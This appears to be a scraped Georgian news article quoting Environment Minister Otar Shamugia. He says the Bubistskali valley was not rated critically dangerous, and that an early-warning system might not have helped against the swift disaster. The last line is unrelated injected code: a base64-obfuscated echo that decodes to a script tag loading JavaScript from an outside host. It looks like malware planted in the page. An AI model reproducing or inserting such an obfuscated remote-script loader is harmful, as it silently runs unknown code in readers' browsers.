celsiusi
ავერსი საქკაბელი

გარემოს დაცვის მინისტრის ოთარ შამუგიას განცხადებით, მდინარე ბუბისწყლის ხეობა არ იყო მიჩნეული კრიტიკულად საშიშ ხეობად, შესაბამისად, ვერ იქნებოდა განხილული, რომ პირველივე შემთხვევაში იქ უნდა ყოფილიყო დამონტაჟებული ადრეული გაფრთხილების სისტემები. ამასთან, მინისტრის თქმით, იმდენად სწრაფი, მასშტაბური და კომპლექსური იყო ეს სტიქია, რომ ადრეული გაფრთხილების სისტემასაც კი შეიძლებოდა, შედეგი ვერ გამოეღო.

„რაც შეეხება ამ ხეობას, დასკვნაშიც წერია ეს ყველაფერი, სპეციალისტების დასკვნიდან გამომდინარე ვსაუბრობ, ეს ხეობა არ იყო მიჩნეული კრიტიკულად საშიშ ხეობად, ვინაიდან ბოლო 100 წლის განმავლობაში ამ მდინარეზე არ ფიქსირდებოდა რაიმე ღვარცოფული  ან კატასტროფული მოვლენა. სპეციალისტებისთვის ზოგადად ხეობა და ზოგადად რაჭის რეგიონი, რა თქმა უნდა, არის გარკვეული ღვარცოფების და რისკების შემცველი, თუმცა კონკრეტულად ეს მონაკვეთი ანალიზიდან გამომდინარე არ იყო შეფასებული, როგორც ასეთი კატასტროფის განვითარების რისკის ზონა.

შესაბამისად, ვერ იქნებოდა განხილული, რომ პირველივე შემთხვევაში აქ უნდა ყოფილიყო დამონტაჟებული ადრეული გაფრთხილების სისტემები. რომც ყოფილიყო, ვთქვათ, გვქონოდა, იმდენად სწრაფად მოხდა ეს პროცესები, რომ შეიძლებოდა, ვერ ყოფილიყო ეფექტური. ძალიან ბევრი სპეკულირება მიდის ამ თემაზე, ისევ და ისევ სპეციალისტების მოსაზრებით და მათი დასკვნით, იმდენად სწრაფი, მასშტაბური და კომპლექსური იყო ეს სტიქია, რომ თუნდაც ადრეული გაფრთხილების სისტემასაც შეიძლებოდა ვერ გამოეღო შედეგი. სტიქია ხდება ყველგან, მთელ მსოფლიოში. ვაკვირდებით, რომ ყველა ქვეყანაში, განვითარებულ ქვეყნებში, სადაც გაცილებით მეტად არის ეს სისტემები განვითარებული, ამ ყველაფრის მიუხედავად, ისინი ვერ ახერხებენ სტიქიის პრევენციას, ეს სამწუხაროა, თუმცა ასეა. ჩვენ ყველაფერს ვაკეთებთ და გავაკეთებთ, რათა მონიტორინგის ქსელი ქვეყანაში იყოს გამართული და ეს ასეც იქნება“, – აღნიშნა ოთარ შამუგიამ.

330
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");